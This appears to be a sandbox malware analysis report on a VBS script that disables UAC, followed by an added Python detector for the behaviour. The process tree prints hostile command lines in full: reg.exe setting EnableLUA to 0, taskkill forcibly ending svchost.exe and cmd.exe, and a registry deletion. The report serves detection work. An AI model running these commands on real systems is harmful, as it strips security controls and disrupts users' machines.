Analysis

  • max time kernel
    20s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags
    arch:x64, arch:x86, image:win11-20240412-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    16/04/2024, 01:10

General

  • Target

    Def Byp/vbs.vbs

  • Size

    1KB

  • MD5

    8fc69337ab4bbb5ffa1ae6bce6be8b63

  • SHA1

    826a48936ab1d485d28eb2db4401502e4d0e8891

  • SHA256

    517e1a63494abb3a33c37dd5a68caa36b44a8a3c18e8729d06d6f81dda3f11c4

  • SHA512

    ed832c83972a451392fbf9f59468d64dd2e1ae11d026dbb4346b4ca15c5dc1f11df939c769f10c72a09a78866256da0ff9c4578f6bef1cd374db029342056c65

Score
10/10

Malware Config

Signatures

  • UAC bypass 3 TTPs 2 IoCs

    Sets EnableLUA to 0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. This disables UAC machine-wide once the host reboots rather than bypassing a prompt, and the HKLM write only succeeds from an already-elevated process.

  • Disables Task Manager via registry modification

    No child process in the tree below performs this write, so it was made in-process by the script host.
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 3 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Def Byp\vbs.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4256
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\Windows\System32\reg.exe
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • Modifies registry key
        PID:1696
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v ABC_DEF /f
      2⤵
      PID:3532
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Def Byp\vbs.vbs" uac
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1212
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4640
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • Modifies registry key
          PID:4924
      • C:\Windows\System32\reg.exe
        "C:\Windows\System32\reg.exe" DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v ABC_DEF /f
        3⤵
        PID:2996
      • C:\Windows\System32\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im cmd.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4576
    • C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /f /im cmd.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1520
    • C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /f /im svchost.exe
      2⤵
      • Kills process with taskkill
      PID:3548
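The tree above is a compact detection case: a script host (WScript.exe) spawning cmd.exe, reg.exe and taskkill.exe, the script re-launching itself with the argument uac and repeating the same EnableLUA write, and taskkill aimed at svchost.exe. The following is an added example, not part of the sandbox report or of the analysed sample: a small Python detector that runs three rules over Sysmon Event ID 1 style process-creation events (fields pid, ppid, image, cmdline are an assumed normalised schema). The sample events are constructed from the command lines and PIDs in the tree, plus two invented benign negatives. The UAC rule goes slightly beyond the report and also flags ConsentPromptBehaviorAdmin and PromptOnSecureDesktop being set to 0, and the list of protected images for the taskkill rule is an assumption.

```python
import ntpath
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style),
# modelled on the command lines and PIDs in the process tree above.
# The two trailing events are invented benign negatives.
SAMPLE_EVENTS = [
    {"pid": 4256, "ppid": 1000, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Def Byp\vbs.vbs"'},
    {"pid": 5024, "ppid": 4256, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f'},
    {"pid": 1696, "ppid": 5024, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f'},
    {"pid": 3532, "ppid": 4256, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'"C:\Windows\System32\reg.exe" DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v ABC_DEF /f'},
    {"pid": 1212, "ppid": 4256, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Def Byp\vbs.vbs" uac'},
    {"pid": 4576, "ppid": 1212, "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": r'"C:\Windows\System32\taskkill.exe" /f /im cmd.exe'},
    {"pid": 3548, "ppid": 4256, "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": r'"C:\Windows\System32\taskkill.exe" /f /im svchost.exe'},
    # Benign negatives (invented): an admin console re-enabling UAC, and a normal taskkill.
    {"pid": 7000, "ppid": 6000, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f'},
    {"pid": 7001, "ppid": 6000, "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": r'taskkill /f /im notepad.exe'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBINS = {"reg.exe", "cmd.exe", "taskkill.exe"}
# UAC policy values under HKLM\...\Policies\System where data 0 weakens UAC.
UAC_POLICY_VALUES = {"enablelua", "consentpromptbehavioradmin", "promptonsecuredesktop"}
# Assumed list of images a script should never be killing.
PROTECTED_IMAGES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe", "msmpeng.exe"}

# reg[.exe] add <key> ... /v <name> ... /d <data>; quotes optional around each token.
RE_REG_ADD = re.compile(
    r'\breg(?:\.exe)?"?\s+add\s+"?(?P<key>[^\s"]+)"?.*?/v\s+"?(?P<name>[^\s"]+)"?.*?/d\s+"?(?P<data>[^\s"]+)',
    re.IGNORECASE)
RE_TASKKILL_IM = re.compile(r'\btaskkill(?:\.exe)?"?\s.*?/im\s+"?(?P<image>[^\s"]+)', re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def uac_weakened(cmdline):
    """True when the command line sets a UAC policy value to 0 via reg add."""
    m = RE_REG_ADD.search(cmdline)
    if not m or not m.group("key").lower().endswith(r"\policies\system"):
        return False
    if m.group("name").lower() not in UAC_POLICY_VALUES:
        return False
    try:
        return int(m.group("data"), 0) == 0   # accepts "0" and "0x0"
    except ValueError:
        return False


def taskkill_target(cmdline):
    """Image name passed to taskkill /im, or None."""
    m = RE_TASKKILL_IM.search(cmdline)
    return m.group("image").lower() if m else None


def detect(events):
    """Return (rule, pid) findings for the three behaviours seen in the tree."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img = basename(e["image"])
        cmd = e["cmdline"]
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) in SCRIPT_HOSTS and img in LOLBINS:
            findings.append(("script_host_spawns_lolbin", e["pid"]))
        if uac_weakened(cmd):
            findings.append(("uac_policy_disabled", e["pid"]))
        if img == "taskkill.exe" and taskkill_target(cmd) in PROTECTED_IMAGES:
            findings.append(("taskkill_protected_process", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: PID {pid}")
```

The UAC rule matches on the command line rather than on the image so that both the `cmd.exe /k reg.exe ADD ...` wrapper and the reg.exe child are flagged; that mirrors the report, where both the wrapper and the child carry the same write. The parent lookup is what separates this from a plain string match: reg.exe under a console is routine, reg.exe under wscript.exe is not.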

Network

MITRE ATT&CK Enterprise v15
